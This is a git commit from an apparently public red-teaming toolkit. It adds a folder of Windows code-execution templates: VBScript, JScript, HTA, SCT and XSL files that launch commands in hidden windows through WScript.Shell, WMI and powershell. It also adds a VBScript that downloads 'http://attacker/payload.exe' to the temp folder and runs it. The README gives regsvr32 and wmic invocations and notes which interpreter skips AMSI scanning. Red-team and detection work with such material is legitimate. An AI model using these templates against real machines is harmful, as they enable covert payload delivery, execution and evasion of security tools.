Added code-exec-templates

2024-11-21 18:11:37 +01:00 · 2020-05-06 19:22:32 +02:00 · 2020-05-06 19:22:32 +02:00 · 8e976e7cee
commit 8e976e7cee
parent ce933bb1c5
10 changed files with 207 additions and 0 deletions
--- a/red-teaming/README.md
+++ b/red-teaming/README.md
@ -52,6 +52,8 @@ cmstp.exe /ni /s cmstp.inf

 - **`cobalt-arsenal`** - A set of my published Cobalt Strike 4.0+ compatible aggressor scripts. That includes couple of my handy utils I've used on various engagements.

+- [**`code-exec-templates`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/code-exec-templates) - a small collection of template/backbone files for various code-execution techniques (VBScript/JScript embedded in HTA/SCT/XSL/VBS/JS)
+
 - **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
 . ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc))

--- a/red-teaming/code-exec-templates/README.md
+++ b/red-teaming/code-exec-templates/README.md
@ -0,0 +1,57 @@
+### A small collection of unobfuscated code-execution primitives in different languages
+
+A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one.
+
+Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters:
+
+- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI**
+
+- `wscript.exe` - For general scripts execution. **This one loads AMSI**
+
+
+#### VBScript
+
+- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
+
+- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
+
+- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
+
+- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell`
+
+
+#### JScript
+
+
+#### XSL
+
+XSL files can be executed in the following ways:
+
+- Using `wmic.exe`:
+```
+wmic os get /format:"jscript-xslt-template.xsl"
+```
+
+Templates:
+
+- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box.
+
+- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method
+
+
+
+#### COM Scriptlets
+
+Sample code execution with `regsvr32` can be following:
+```
+regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll
+```
+
+- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run`
+
+
+#### HTA
+
+HTA files are HTML Applications
+
+- **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_ 
--- a/red-teaming/code-exec-templates/download-file-and-exec.vbs
+++ b/red-teaming/code-exec-templates/download-file-and-exec.vbs
@ -0,0 +1,38 @@
+'
+' Example of downloading a binary file from the URL, saving it to the
+' local filesystem and then launching.
+'
+' Mariusz B. / mgeeky, <mb@binary-offensive.com>
+' (https://github.com/mgeeky)
+'
+
+downloadURL = "http://attacker/payload.exe"
+saveAs = "%TEMP%\foo.exe"
+parameters = ""
+
+Dim sh: Set sh = CreateObject("WScript.Shell")
+out = sh.ExpandEnvironmentStrings(saveAs)
+
+' STEP 1: Download File
+Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
+xhr.Open "GET", downloadURL, False
+xhr.Send
+
+' STEP 2: Save binary file
+If xhr.Status = 200 Then
+    With CreateObject("Adodb.Stream")
+        .Open
+        .Type = 1
+        .write xhr.responseBody
+        .savetofile out, 2
+    End With
+
+    ' STEP 3: Execute file
+    cmd = out & " " & parameters
+    MsgBox cmd
+    sh.Run cmd, 0, False
+
+End If
+
+Set sh = Nothing
+Set xhr = Nothing
--- a/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl
+++ b/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl
@ -0,0 +1,15 @@
+<?xml version='1.0'?>
+<stylesheet
+xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
+xmlns:user="placeholder"
+version="1.0">
+<output method="text"/>
+<ms:script implements-prefix="user" language="JScript">
+<![CDATA[
+
+// Hello world
+var shell = new ActiveXObject("WScript.Shell");
+shell.Popup("Hello world from JScript XSL!");
+
+]]> </ms:script>
+</stylesheet>
--- a/red-teaming/code-exec-templates/wmi-exec-command.vbs
+++ b/red-teaming/code-exec-templates/wmi-exec-command.vbs
@ -0,0 +1,20 @@
+'
+' This script uses WMI class' Win32_Process static method Create to 
+' execute given command in a hidden window (ShowWindow = 12).
+'
+' Mariusz B. / mgeeky, <mb@binary-offensive.com>
+' (https://github.com/mgeeky)
+'
+
+command = "notepad.exe"
+computer = "."
+
+Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
+        & computer & "\root\cimv2")
+
+Set startup = wmi.Get("Win32_ProcessStartup")
+Set conf = startup.SpawnInstance_
+conf.ShowWindow = 12
+
+Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
+proc.Create command, Null, conf, intProcessID
--- a/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs
+++ b/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs
@ -0,0 +1,13 @@
+'
+' This script uses classic WScript.Shell Run method to
+' execute given command in a hidden window (second param = 0)
+'
+' Mariusz B. / mgeeky, <mb@binary-offensive.com>
+' (https://github.com/mgeeky)
+'
+
+command = "notepad.exe"
+
+With CreateObject("WScript.Shell")
+	.Run command, 0, False
+End With
--- a/red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct
+++ b/red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct
@ -0,0 +1,15 @@
+<?XML version="1.0"?>
+<scriptlet>
+<registration         
+progid="Foo"       
+classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
+<script language="JScript">
+<![CDATA[  
+
+var command = "notepad.exe";
+var r = new ActiveXObject("WScript.Shell").Run(command); 
+
+]]>
+</script>
+</registration>
+</scriptlet>
--- a/red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl
+++ b/red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl
@ -0,0 +1,14 @@
+<?xml version='1.0'?>
+<stylesheet
+xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
+xmlns:user="placeholder"
+version="1.0">
+<output method="text"/>
+	<ms:script implements-prefix="user" language="JScript">
+	<![CDATA[
+
+	var command = "notepad";
+	var r = new ActiveXObject("WScript.Shell").Run(command);
+
+	]]> </ms:script>
+</stylesheet>
--- a/red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta
+++ b/red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta
@ -0,0 +1,14 @@
+<html>
+<head>
+<script language="VBScript"> 
+    Sub foo
+    	command = "notepad.exe"
+        Set objShell = CreateObject("Wscript.Shell")
+        objShell.Run command
+    End Sub
+foo()
+</script>
+</head> 
+<body>
+</body>
+</html>
--- a/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs
+++ b/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs
@ -0,0 +1,19 @@
+'
+' This script uses classic WScript.Shell Exec method to
+' execute given command in a hidden window via StdIn passed to a dedicated
+' launcher command (powershell.exe in this example).
+'
+' Mariusz B. / mgeeky, <mb@binary-offensive.com>
+' (https://github.com/mgeeky)
+'
+
+command = "notepad.exe"
+launcher = "powershell -nop -w hid -Command -"
+
+With CreateObject("WScript.Shell")
+	With .Exec(launcher)
+        .StdIn.WriteLine command
+        .StdIn.WriteBlankLines 1
+        .Terminate
+    End With
+End With